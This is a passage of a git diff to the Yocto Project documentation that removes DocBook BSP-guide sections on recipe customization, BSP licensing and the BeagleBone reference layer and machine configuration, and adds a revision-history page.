- <para>
- Following are recommendations for released BSPs that
- conform to the Yocto Project:
- <itemizedlist>
- <listitem><para>
- <emphasis>Bootable Images:</emphasis>
- Released BSPs can contain one or more bootable
- images.
- Including bootable images allows users to easily
- try out the BSP using their own hardware.</para>
-
- <para>In some cases, it might not be convenient
- to include a bootable image.
- If so, you might want to make two versions of the
- BSP available: one that contains binary images, and
- one that does not.
- The version that does not contain bootable images
- avoids unnecessary download times for users not
- interested in the images.</para>
-
- <para>If you need to distribute a BSP and include
- bootable images or build kernel and filesystems
- meant to allow users to boot the BSP for evaluation
- purposes, you should put the images and artifacts
- within a
- <filename>binary/</filename> subdirectory located
- in the
- <filename>meta-</filename><replaceable>bsp_root_name</replaceable>
- directory.
- <note>
- If you do include a bootable image as part
- of the BSP and the image was built by software
- covered by the GPL or other open source licenses,
- it is your responsibility to understand
- and meet all licensing requirements, which could
- include distribution of source files.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Use a Yocto Linux Kernel:</emphasis>
- Kernel recipes in the BSP should be based on a
- Yocto Linux kernel.
- Basing your recipes on these kernels reduces
- the costs for maintaining the BSP and increases
- its scalability.
- See the <filename>Yocto Linux Kernel</filename>
- category in the
- <ulink url='&YOCTO_GIT_URL;'>Source Repositories</ulink>
- for these kernels.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-
-<section id='customizing-a-recipe-for-a-bsp'>
- <title>Customizing a Recipe for a BSP</title>
-
- <para>
- If you plan on customizing a recipe for a particular BSP,
- you need to do the following:
- <itemizedlist>
- <listitem><para>
- Create a <filename>*.bbappend</filename> file for
- the modified recipe.
- For information on using append files, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#using-bbappend-files'>Using .bbappend Files in Your Layer</ulink>"
- section in the Yocto Project Development Tasks
- Manual.
- </para></listitem>
- <listitem><para>
- Ensure your directory structure in the BSP layer
- that supports your machine is such that the
- OpenEmbedded build system can find it.
- See the example later in this section for more
- information.
- </para></listitem>
- <listitem><para>
- Put the append file in a directory whose name matches
- the machine's name and is located in an appropriate
- sub-directory inside the BSP layer (i.e.
- <filename>recipes-bsp</filename>,
- <filename>recipes-graphics</filename>,
- <filename>recipes-core</filename>, and so forth).
- </para></listitem>
- <listitem><para>
- Place the BSP-specific files in the proper
- directory inside the BSP layer.
- How expansive the layer is affects where you must
- place these files.
- For example, if your layer supports several
- different machine types, you need to be sure your
- layer's directory structure includes hierarchy
- that separates the files according to machine.
- If your layer does not support multiple machines,
- the layer would not have that additional hierarchy
- and the files would obviously not be able to reside
- in a machine-specific directory.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Following is a specific example to help you better understand
- the process.
- This example customizes customizes a recipe by adding a
- BSP-specific configuration file named
- <filename>interfaces</filename> to the
- <filename>init-ifupdown_1.0.bb</filename> recipe for machine
- "xyz" where the BSP layer also supports several other
- machines:
- <orderedlist>
- <listitem><para>
- Edit the
- <filename>init-ifupdown_1.0.bbappend</filename> file
- so that it contains the following:
- <literallayout class='monospaced'>
- FILESEXTRAPATHS_prepend := "${THISDIR}/files:"
- </literallayout>
- The append file needs to be in the
- <filename>meta-xyz/recipes-core/init-ifupdown</filename>
- directory.
- </para></listitem>
- <listitem><para>
- Create and place the new
- <filename>interfaces</filename> configuration file in
- the BSP's layer here:
- <literallayout class='monospaced'>
- meta-xyz/recipes-core/init-ifupdown/files/xyz-machine-one/interfaces
- </literallayout>
- <note>
- If the <filename>meta-xyz</filename> layer did
- not support multiple machines, you would place
- the <filename>interfaces</filename> configuration
- file in the layer here:
- <literallayout class='monospaced'>
- meta-xyz/recipes-core/init-ifupdown/files/interfaces
- </literallayout>
- </note>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
- variable in the append files extends the search path
- the build system uses to find files during the build.
- Consequently, for this example you need to have the
- <filename>files</filename> directory in the same
- location as your append file.
- </para></listitem>
- </orderedlist>
- </para>
-</section>
-
-<section id='bsp-licensing-considerations'>
- <title>BSP Licensing Considerations</title>
-
- <para>
- In some cases, a BSP contains separately-licensed
- Intellectual Property (IP) for a component or components.
- For these cases, you are required to accept the terms
- of a commercial or other type of license that requires
- some kind of explicit End User License Agreement (EULA).
- Once you accept the license, the OpenEmbedded build system
- can then build and include the corresponding component
- in the final BSP image.
- If the BSP is available as a pre-built image, you can
- download the image after agreeing to the license or EULA.
- </para>
-
- <para>
- You could find that some separately-licensed components
- that are essential for normal operation of the system might
- not have an unencumbered (or free) substitute.
- Without these essential components, the system would be
- non-functional.
- Then again, you might find that other licensed components
- that are simply 'good-to-have' or purely elective do have
- an unencumbered, free replacement component that you can
- use rather than agreeing to the separately-licensed
- component.
- Even for components essential to the system, you might
- find an unencumbered component that is not identical but
- will work as a less-capable version of the licensed version
- in the BSP recipe.
- </para>
-
- <para>
- For cases where you can substitute a free component and
- still maintain the system's functionality, the "DOWNLOADS"
- selection from the "SOFTWARE" tab on the
- <ulink url='&YOCTO_HOME_URL;'>Yocto Project website</ulink>
- makes available de-featured BSPs that are completely free
- of any IP encumbrances.
- For these cases, you can use the substitution directly and
- without any further licensing requirements.
- If present, these fully de-featured BSPs are named
- appropriately different as compared to the names of their
- respective encumbered BSPs.
- If available, these substitutions are your simplest and
- most preferred options.
- Obviously, use of these substitutions assumes the resulting
- functionality meets system requirements.
- <note>
- If however, a non-encumbered version is unavailable or
- it provides unsuitable functionality or quality, you can
- use an encumbered version.
- </note>
- </para>
-
- <para>
- A couple different methods exist within the OpenEmbedded
- build system to satisfy the licensing requirements for an
- encumbered BSP.
- The following list describes them in order of preference:
- <orderedlist>
- <listitem><para>
- <emphasis>Use the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE_FLAGS'><filename>LICENSE_FLAGS</filename></ulink>
- Variable to Define the Recipes that Have Commercial
- or Other Types of Specially-Licensed Packages:</emphasis>
- For each of those recipes, you can specify a
- matching license string in a
- <filename>local.conf</filename> variable named
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE_FLAGS_WHITELIST'><filename>LICENSE_FLAGS_WHITELIST</filename></ulink>.
- Specifying the matching license string signifies
- that you agree to the license.
- Thus, the build system can build the corresponding
- recipe and include the component in the image.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#enabling-commercially-licensed-recipes'>Enabling Commercially Licensed Recipes</ulink>"
- section in the Yocto Project Development Tasks
- Manual for details on how to use these variables.
- </para>
-
- <para>If you build as you normally would, without
- specifying any recipes in the
- <filename>LICENSE_FLAGS_WHITELIST</filename>, the
- build stops and provides you with the list of recipes
- that you have tried to include in the image that
- need entries in the
- <filename>LICENSE_FLAGS_WHITELIST</filename>.
- Once you enter the appropriate license flags into
- the whitelist, restart the build to continue where
- it left off.
- During the build, the prompt will not appear again
- since you have satisfied the requirement.</para>
-
- <para>Once the appropriate license flags are on the
- white list in the
- <filename>LICENSE_FLAGS_WHITELIST</filename> variable,
- you can build the encumbered image with no change
- at all to the normal build process.
- </para></listitem>
- <listitem><para>
- <emphasis>Get a Pre-Built Version of the BSP:</emphasis>
- You can get this type of BSP by selecting the
- "DOWNLOADS" item from the "SOFTWARE" tab on the
- <ulink url='&YOCTO_HOME_URL;'>Yocto Project website</ulink>.
- You can download BSP tarballs that contain
- proprietary components after agreeing to the
- licensing requirements of each of the individually
- encumbered packages as part of the download process.
- Obtaining the BSP this way allows you to access an
- encumbered image immediately after agreeing to the
- click-through license agreements presented by the
- website.
- If you want to build the image yourself using
- the recipes contained within the BSP tarball,
- you will still need to create an appropriate
- <filename>LICENSE_FLAGS_WHITELIST</filename>
- to match the encumbered recipes in the BSP.
- </para></listitem>
- </orderedlist>
- <note>
- Pre-compiled images are bundled with a time-limited
- kernel that runs for a predetermined amount of time
- (10 days) before it forces the system to reboot.
- This limitation is meant to discourage direct
- redistribution of the image.
- You must eventually rebuild the image if you want
- to remove this restriction.
- </note>
- </para>
-</section>
-
-<section id='creating-a-new-bsp-layer-using-the-bitbake-layers-script'>
- <title>Creating a new BSP Layer Using the <filename>bitbake-layers</filename> Script</title>
-
- <para>
- The <filename>bitbake-layers create-layer</filename> script
- automates creating a BSP layer.
- What makes a layer a "BSP layer" is the presence of at least one machine
- configuration file.
- Additionally, a BSP layer usually has a kernel recipe
- or an append file that leverages off an existing kernel recipe.
- The primary requirement, however, is the machine configuration.
- </para>
-
- <para>
- Use these steps to create a BSP layer:
- <itemizedlist>
- <listitem><para>
- <emphasis>Create a General Layer:</emphasis>
- Use the <filename>bitbake-layers</filename> script with the
- <filename>create-layer</filename> subcommand to create a
- new general layer.
- For instructions on how to create a general layer using the
- <filename>bitbake-layers</filename> script, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-general-layer-using-the-bitbake-layers-script'>Creating a General Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para>
- <emphasis>Create a Layer Configuration File:</emphasis>
- Every layer needs a layer configuration file.
- This configuration file establishes locations for the
- layer's recipes, priorities for the layer, and so forth.
- You can find examples of <filename>layer.conf</filename>
- files in the Yocto Project
- <ulink url='&YOCTO_GIT_URL;'>Source Repositories</ulink>.
- To get examples of what you need in your configuration
- file, locate a layer (e.g. "meta-ti") and examine the
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/meta-ti/tree/conf/layer.conf'></ulink>
- file.
- </para></listitem>
- <listitem><para>
- <emphasis>Create a Machine Configuration File:</emphasis>
- Create a <filename>conf/machine/</filename><replaceable>bsp_root_name</replaceable><filename>.conf</filename>
- file.
- See
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta-yocto-bsp/conf/machine'><filename>meta-yocto-bsp/conf/machine</filename></ulink>
- for sample
- <replaceable>bsp_root_name</replaceable><filename>.conf</filename>
- files.
- Other samples such as
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/meta-ti/tree/conf/machine'><filename>meta-ti</filename></ulink>
- and
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/meta-freescale/tree/conf/machine'><filename>meta-freescale</filename></ulink>
- exist from other vendors that have more specific machine
- and tuning examples.
- </para></listitem>
- <listitem><para>
- <emphasis>Create a Kernel Recipe:</emphasis>
- Create a kernel recipe in <filename>recipes-kernel/linux</filename>
- by either using a kernel append file or a new custom kernel
- recipe file (e.g. <filename>yocto-linux_4.12.bb</filename>).
- The BSP layers mentioned in the previous step also contain different
- kernel examples.
- See the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#modifying-an-existing-recipe'>Modifying an Existing Recipe</ulink>"
- section in the Yocto Project Linux Kernel Development Manual
- for information on how to create a custom kernel.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- The remainder of this section provides a description of
- the Yocto Project reference BSP for Beaglebone, which
- resides in the
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta-yocto-bsp'><filename>meta-yocto-bsp</filename></ulink>
- layer.
- </para>
-
- <section id='bsp-layer-configuration-example'>
- <title>BSP Layer Configuration Example</title>
-
- <para>
- The layer's <filename>conf</filename> directory
- contains the <filename>layer.conf</filename>
- configuration file.
- In this example, the
- <filename>conf/layer.conf</filename> is the
- following:
- <literallayout class='monospaced'>
- # We have a conf and classes directory, add to BBPATH
- BBPATH .= ":${LAYERDIR}"
-
- # We have recipes-* directories, add to BBFILES
- BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
- ${LAYERDIR}/recipes-*/*/*.bbappend"
-
- BBFILE_COLLECTIONS += "yoctobsp"
- BBFILE_PATTERN_yoctobsp = "^${LAYERDIR}/"
- BBFILE_PRIORITY_yoctobsp = "5"
- LAYERVERSION_yoctobsp = "4"
- LAYERSERIES_COMPAT_yoctobsp = "&DISTRO_NAME_NO_CAP;"
- </literallayout>
- The variables used in this file configure the
- layer.
- A good way to learn about layer configuration
- files is to examine various files for BSP from
- the
- <ulink url='&YOCTO_GIT_URL;'>Source Repositories</ulink>.
- </para>
-
- <para>
- For a detailed description of this particular
- layer configuration file, see
- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-layer-config-file-description'>step 3</ulink>
- in the discussion that describes how to create
- layers in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='bsp-machine-configuration-example'>
- <title>BSP Machine Configuration Example</title>
-
- <para>
- As mentioned earlier in this section, the existence
- of a machine configuration file is what makes a
- layer a BSP layer as compared to a general or
- kernel layer.
- </para>
-
- <para>
- One or more machine configuration files exist in the
- <replaceable>bsp_layer</replaceable><filename>/conf/machine/</filename>
- directory of the layer:
- <literallayout class='monospaced'>
- <replaceable>bsp_layer</replaceable><filename>/conf/machine/</filename><replaceable>machine1</replaceable><filename>.conf</filename>
- <replaceable>bsp_layer</replaceable><filename>/conf/machine/</filename><replaceable>machine2</replaceable><filename>.conf</filename>
- <replaceable>bsp_layer</replaceable><filename>/conf/machine/</filename><replaceable>machine3</replaceable><filename>.conf</filename>
- ... more ...
- </literallayout>
- For example, the machine configuration file for the
- <ulink url='http://beagleboard.org/bone'>BeagleBone and BeagleBone Black development boards</ulink>
- is located in the layer
- <filename>poky/meta-yocto-bsp/conf/machine</filename>
- and is named <filename>beaglebone-yocto.conf</filename>:
- <literallayout class='monospaced'>
- #@TYPE: Machine
- #@NAME: Beaglebone-yocto machine
- #@DESCRIPTION: Reference machine configuration for http://beagleboard.org/bone and http://beagleboard.org/black boards
-
- PREFERRED_PROVIDER_virtual/xserver ?= "xserver-xorg"
- XSERVER ?= "xserver-xorg \
- xf86-video-modesetting \
- "
-
- MACHINE_EXTRA_RRECOMMENDS = "kernel-modules kernel-devicetree"
-
- EXTRA_IMAGEDEPENDS += "u-boot"
-
- DEFAULTTUNE ?= "cortexa8hf-neon"
- include conf/machine/include/tune-cortexa8.inc
-
- IMAGE_FSTYPES += "tar.bz2 jffs2 wic wic.bmap"
- EXTRA_IMAGECMD_jffs2 = "-lnp "
- WKS_FILE ?= "beaglebone-yocto.wks"
- IMAGE_INSTALL_append = " kernel-devicetree kernel-image-zimage"
- do_image_wic[depends] += "mtools-native:do_populate_sysroot dosfstools-native:do_populate_sysroot"
-
- SERIAL_CONSOLES ?= "115200;ttyS0 115200;ttyO0"
- SERIAL_CONSOLES_CHECK = "${SERIAL_CONSOLES}"
-
- PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
- PREFERRED_VERSION_linux-yocto ?= "5.0%"
-
- KERNEL_IMAGETYPE = "zImage"
- KERNEL_DEVICETREE = "am335x-bone.dtb am335x-boneblack.dtb am335x-bonegreen.dtb"
- KERNEL_EXTRA_ARGS += "LOADADDR=${UBOOT_ENTRYPOINT}"
-
- SPL_BINARY = "MLO"
- UBOOT_SUFFIX = "img"
- UBOOT_MACHINE = "am335x_evm_defconfig"
- UBOOT_ENTRYPOINT = "0x80008000"
- UBOOT_LOADADDRESS = "0x80008000"
-
- MACHINE_FEATURES = "usbgadget usbhost vfat alsa"
-
- IMAGE_BOOT_FILES ?= "u-boot.${UBOOT_SUFFIX} MLO zImage am335x-bone.dtb am335x-boneblack.dtb am335x-bonegreen.dtb"
- </literallayout>
- The variables used to configure the machine define
- machine-specific properties;
- for example, machine-dependent packages, machine
- tunings, the type of kernel to build, and
- U-Boot configurations.
- </para>
-
- <para>
- The following list provides some explanation
- for the statements found in the example reference
- machine configuration file for the BeagleBone
- development boards.
- Realize that much more can be defined as part of
- a machine's configuration file.
- In general, you can learn about related variables
- that this example does not have by locating the
- variables in the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-variables-glos'>Yocto Project Variables Glossary</ulink>"
- in the Yocto Project Reference Manual.
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_PROVIDER'><filename>PREFERRED_PROVIDER_virtual/xserver</filename></ulink>:
- The recipe that provides "virtual/xserver" when
- more than one provider is found.
- In this case, the recipe that provides
- "virtual/xserver" is "xserver-xorg", which
- exists in
- <filename>poky/meta/recipes-graphics/xorg-xserver</filename>.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-XSERVER'><filename>XSERVER</filename></ulink>:
- The packages that should be installed to provide
- an X server and drivers for the machine.
- In this example, the "xserver-xorg" and
- "xf86-video-modesetting" are installed.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_EXTRA_RRECOMMENDS'><filename>MACHINE_EXTRA_RRECOMMENDS</filename></ulink>:
- A list of machine-dependent packages
- not essential for booting the image.
- Thus, the build does not fail if the packages
- do not exist.
- However, the packages are required for a
- fully-featured image.
- <note><title>Tip</title>
- Many <filename>MACHINE*</filename> variables
- exist that help you configure a particular
- piece of hardware.
- </note>
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_IMAGEDEPENDS'><filename>EXTRA_IMAGEDEPENDS</filename></ulink>:
- Recipes to build that do not provide packages
- for installing into the root filesystem
- but building the image depends on the
- recipes.
- Sometimes a recipe is required to build
- the final image but is not needed in the
- root filesystem.
- In this case, the U-Boot recipe must be
- built for the image.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEFAULTTUNE'><filename>DEFAULTTUNE</filename></ulink>:
- Machines use tunings to optimize machine,
- CPU, and application performance.
- These features, which are collectively known
- as "tuning features", exist in the
- <ulink url='&YOCTO_DOCS_REF_URL;#oe-core'>OpenEmbedded-Core (OE-Core)</ulink>
- layer (e.g.
- <filename>poky/meta/conf/machine/include</filename>).
- In this example, the default tunning file is
- "cortexa8hf-neon".
- <note>
- The <filename>include</filename> statement
- that pulls in the
- <filename>conf/machine/include/tune-cortexa8.inc</filename>
- file provides many tuning possibilities.
- </note>
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></ulink>:
- The formats the OpenEmbedded build system
- uses during the build when creating the
- root filesystem.
- In this example, four types of images are
- supported.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_IMAGECMD'><filename>EXTRA_IMAGECMD</filename></ulink>:
- Specifies additional options for image
- creation commands.
- In this example, the "-lnp " option is used
- when creating the
- <ulink url='https://en.wikipedia.org/wiki/JFFS2'>JFFS2</ulink>
- image.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-WKS_FILE'><filename>WKS_FILE</filename></ulink>:
- The location of the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-kickstart'>Wic kickstart</ulink>
- file used by the OpenEmbedded build system to
- create a partitioned image (image.wic).
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></ulink>:
- Specifies packages to install into an image
- through the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-image'><filename>image</filename></ulink>
- class.
- Recipes use the <filename>IMAGE_INSTALL</filename>
- variable.
- </para></listitem>
- <listitem><para>
- <filename>do_image_wic[depends]</filename>:
- A task that is constructed during the build.
- In this example, the task depends on specific tools
- in order to create the sysroot when buiding a Wic
- image.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SERIAL_CONSOLES'><filename>SERIAL_CONSOLES</filename></ulink>:
- Defines a serial console (TTY) to enable using
- getty.
- In this case, the baud rate is "115200" and the
- device name is "ttyO0".
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_PROVIDER'><filename>PREFERRED_PROVIDER_virtual/kernel</filename></ulink>:
- Specifies the recipe that provides
- "virtual/kernel" when more than one provider
- is found.
- In this case, the recipe that provides
- "virtual/kernel" is "linux-yocto", which
- exists in the layer's
- <filename>recipes-kernel/linux</filename> directory.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_VERSION'><filename>PREFERRED_VERSION_linux-yocto</filename></ulink>:
- Defines the version of the recipe used
- to build the kernel, which is "5.0" in this
- case.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_IMAGETYPE'><filename>KERNEL_IMAGETYPE</filename></ulink>:
- The type of kernel to build for the device.
- In this case, the OpenEmbedded build system
- creates a "zImage" image type.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_DEVICETREE'><filename>KERNEL_DEVICETREE</filename></ulink>:
- The names of the generated Linux kernel device
- trees (i.e. the <filename>*.dtb</filename>) files.
- All the device trees for the various BeagleBone
- devices are included.
-<!--
- You have to include some *.inc files according to the definition of KERNEL_DEVICETREE.
- I don't see where these are being provided.
--->
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_EXTRA_ARGS'><filename>KERNEL_EXTRA_ARGS</filename></ulink>:
- Additional <filename>make</filename>
- command-line arguments the OpenEmbedded build
- system passes on when compiling the kernel.
- In this example, "LOADADDR=${UBOOT_ENTRYPOINT}"
- is passed as a command-line argument.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SPL_BINARY'><filename>SPL_BINARY</filename></ulink>:
- Defines the Secondary Program Loader (SPL) binary
- type.
- In this case, the SPL binary is set to
- "MLO", which stands for Multimedia card LOader.
- </para>
-
- <para>The BeagleBone development board requires an
- SPL to boot and that SPL file type must be MLO.
- Consequently, the machine configuration needs to
- define <filename>SPL_BINARY</filename> as "MLO".
- <note>
- For more information on how the SPL variables
- are used, see the
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta/recipes-bsp/u-boot/u-boot.inc'><filename>u-boot.inc</filename></ulink>
- include file.
- </note>
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-UBOOT_ENTRYPOINT'><filename>UBOOT_*</filename></ulink>:
- Defines various U-Boot configurations needed
- to build a U-Boot image.
- In this example, a U-Boot image is required
- to boot the BeagleBone device.
- See the following variables for more information:
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-UBOOT_SUFFIX'><filename>UBOOT_SUFFIX</filename></ulink>:
- Points to the generated U-Boot extension.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-UBOOT_MACHINE'><filename>UBOOT_MACHINE</filename></ulink>:
- Specifies the value passed on the make command line when building a U-Boot image.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-UBOOT_ENTRYPOINT'><filename>UBOOT_ENTRYPOINT</filename></ulink>:
- Specifies the entry point for the U-Boot image.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-UBOOT_LOADADDRESS'><filename>UBOOT_LOADADDRESS</filename></ulink>:
- Specifies the load address for the U-Boot image.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_FEATURES'><filename>MACHINE_FEATURES</filename></ulink>:
- Specifies the list of hardware features the
- BeagleBone device is capable of supporting.
- In this case, the device supports
- "usbgadget usbhost vfat alsa".
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_BOOT_FILES'><filename>IMAGE_BOOT_FILES</filename></ulink>:
- Files installed into the device's boot partition
- when preparing the image using the Wic tool
- with the <filename>bootimg-partition</filename>
- source plugin.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='bsp-kernel-recipe-example'>
- <title>BSP Kernel Recipe Example</title>
-
- <para>
- The kernel recipe used to build the kernel image
- for the BeagleBone device was established in the
- machine configuration:
- <literallayout class='monospaced'>
- PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
- PREFERRED_VERSION_linux-yocto ?= "5.0%"
- </literallayout>
- The <filename>meta-yocto-bsp/recipes-kernel/linux</filename>
- directory in the layer contains metadata used
- to build the kernel.
- In this case, a kernel append file (i.e.
- <filename>linux-yocto_5.0.bbappend</filename>) is used to
- override an established kernel recipe (i.e.
- <filename>linux-yocto_5.0.bb</filename>), which is
- located in
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta/recipes-kernel/linux'></ulink>.
- </para>
-
- <para>
- Following is the contents of the append file:
- <literallayout class='monospaced'>
- KBRANCH_genericx86 = "v5.0/standard/base"
- KBRANCH_genericx86-64 = "v5.0/standard/base"
- KBRANCH_edgerouter = "v5.0/standard/edgerouter"
- KBRANCH_beaglebone-yocto = "v5.0/standard/beaglebone"
-
- KMACHINE_genericx86 ?= "common-pc"
- KMACHINE_genericx86-64 ?= "common-pc-64"
- KMACHINE_beaglebone-yocto ?= "beaglebone"
-
- SRCREV_machine_genericx86 ?= "3df4aae6074e94e794e27fe7f17451d9353cdf3d"
- SRCREV_machine_genericx86-64 ?= "3df4aae6074e94e794e27fe7f17451d9353cdf3d"
- SRCREV_machine_edgerouter ?= "3df4aae6074e94e794e27fe7f17451d9353cdf3d"
- SRCREV_machine_beaglebone-yocto ?= "3df4aae6074e94e794e27fe7f17451d9353cdf3d"
-
- COMPATIBLE_MACHINE_genericx86 = "genericx86"
- COMPATIBLE_MACHINE_genericx86-64 = "genericx86-64"
- COMPATIBLE_MACHINE_edgerouter = "edgerouter"
- COMPATIBLE_MACHINE_beaglebone-yocto = "beaglebone-yocto"
-
- LINUX_VERSION_genericx86 = "5.0.3"
- LINUX_VERSION_genericx86-64 = "5.0.3"
- LINUX_VERSION_edgerouter = "5.0.3"
- LINUX_VERSION_beaglebone-yocto = "5.0.3"
- </literallayout>
- This particular append file works for all the
- machines that are part of the
- <filename>meta-yocto-bsp</filename> layer.
- The relevant statements are appended with
- the "beaglebone-yocto" string.
- The OpenEmbedded build system uses these
- statements to override similar statements
- in the kernel recipe:
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KBRANCH'><filename>KBRANCH</filename></ulink>:
- Identifies the kernel branch that is validated,
- patched, and configured during the build.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KMACHINE'><filename>KMACHINE</filename></ulink>:
- Identifies the machine name as known by the
- kernel, which is sometimes a different name
- than what is known by the OpenEmbedded build
- system.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>:
- Identifies the revision of the source code used
- to build the image.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-COMPATIBLE_MACHINE'><filename>COMPATIBLE_MACHINE</filename></ulink>:
- A regular expression that resolves to one or
- more target machines with which the recipe
- is compatible.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LINUX_VERSION'><filename>LINUX_VERSION</filename></ulink>:
- The Linux version from kernel.org used by
- the OpenEmbedded build system to build the
- kernel image.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-</chapter>
diff --git a/documentation/bsp-guide/history.rst b/documentation/bsp-guide/history.rst
new file mode 100644
index 0000000000..a67750f6ea
--- /dev/null
+++ b/documentation/bsp-guide/history.rst
@@ -0,0 +1,85 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************
+Manual Revision History
+***********************
+
+.. list-table::
+ :widths: 10 15 40
+ :header-rows: 1
+
+ * - Revision
+ - Date
+ - Note
+ * - 0.9
+ - November 2010
+ - The initial document released with the Yocto Project 0.9 Release
+ * - 1.0
+ - April 2011
+ - Released with the Yocto Project 1.0 Release.
+ * - 1.1
+ - October 2011
+ - Released with the Yocto Project 1.1 Release.
+ * - 1.2
+ - April 2012
+ - Released with the Yocto Project 1.2 Release.
+ * - 1.3
+ - October 2012
+ - Released with the Yocto Project 1.3 Release.
+ * - 1.4
+ - April 2013
+ - Released with the Yocto Project 1.4 Release.
+ * - 1.5
+ - October 2013
+ - Released with the Yocto Project 1.5 Release.
+ * - 1.6
+ - April 2014
+ - Released with the Yocto Project 1.6 Release.
+ * - 1.7
+ - October 2014
+ - Released with the Yocto Project 1.7 Release.
+ * - 1.8
+ - April 2015
+ - Released with the Yocto Project 1.8 Release.
+ * - 2.0
+ - October 2015
+ - Released with the Yocto Project 2.0 Release.
+ * - 2.1
+ - April 2016
+ - Released with the Yocto Project 2.1 Release.
+ * - 2.2
+ - October 2016
+ - Released with the Yocto Project 2.2 Release.
+ * - 2.3
+ - May 2017
+ - Released with the Yocto Project 2.3 Release.
+ * - 2.4
+ - October 2017
+ - Released with the Yocto Project 2.4 Release.
+ * - 2.5
+ - May 2018
+ - Released with the Yocto Project 2.5 Release.
+ * - 2.6
+ - November 2018
+ - Released with the Yocto Project 2.6 Release.
+ * - 2.7
+ - May 2019
+ - Released with the Yocto Project 2.7 Release.
+ * - 3.0
+ - October 2019
+ - Released with the Yocto Project 3.0 Release.
+ * - 3.1
+ - April 2020
+ - Released with the Yocto Project 3.1 Release.
+ * - 3.1.1
+ - June 2020
+ - Released with the Yocto Project 3.1.1 Release.
+ * - 3.1.2
+ - August 2020
+ - Released with the Yocto Project 3.1.2 Release.
+ * - 3.1.3
+ - September 2020
+ - Released with the Yocto Project 3.1.3 Release.
+ * - 3.1.4
+ - November 2020
+ - Released with the Yocto Project 3.1.4 Release.
diff --git a/documentation/conf.py b/documentation/conf.py
new file mode 100644
index 0000000000..e9078e054e
--- /dev/null
